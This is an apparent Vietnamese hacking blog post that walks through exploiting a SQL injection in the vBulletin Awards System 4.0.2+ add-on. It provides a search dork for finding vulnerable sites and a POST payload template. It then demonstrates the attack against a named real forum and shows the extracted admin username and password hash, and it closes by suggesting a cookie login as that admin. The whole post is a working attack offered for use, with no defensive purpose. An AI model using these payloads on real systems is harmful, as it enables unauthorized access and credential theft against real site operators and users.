Thứ Ba, 8 tháng 1, 2013

Tiếp tục exploit vBulletin với Awards System 4.0.2+ SQL Injection

dork thì sáng tạo ra nha
Ở đây mình dùng dork:   inurl:request_award.php Powered by vBulletin® Version 4.0.2
vào site victim với dạng victim.com/request_award.php
Khai thác bằng thêm data với cấu trúc như sau ,có thể dùng addon hackbar nha

do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
-->victim.com/request_award.php
Data:do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit

Mình lấy ví dụ victim là trang ihabteens.com
kết hợp command và query nó 


http://www.ihabteens.com/forums/request_award.php
Post :do=submit&name=award_id=2 &award_request_reason=0&award_request_uid=0' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt,0x3a,email) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#&submit=Submit



Sẽ hiện ra như sau


View source nó và nhận đc là 


--> Dino:ef1b59043951239f1d073772342f119a

login bằng cookie thôi :x

Không có nhận xét nào:

Đăng nhận xét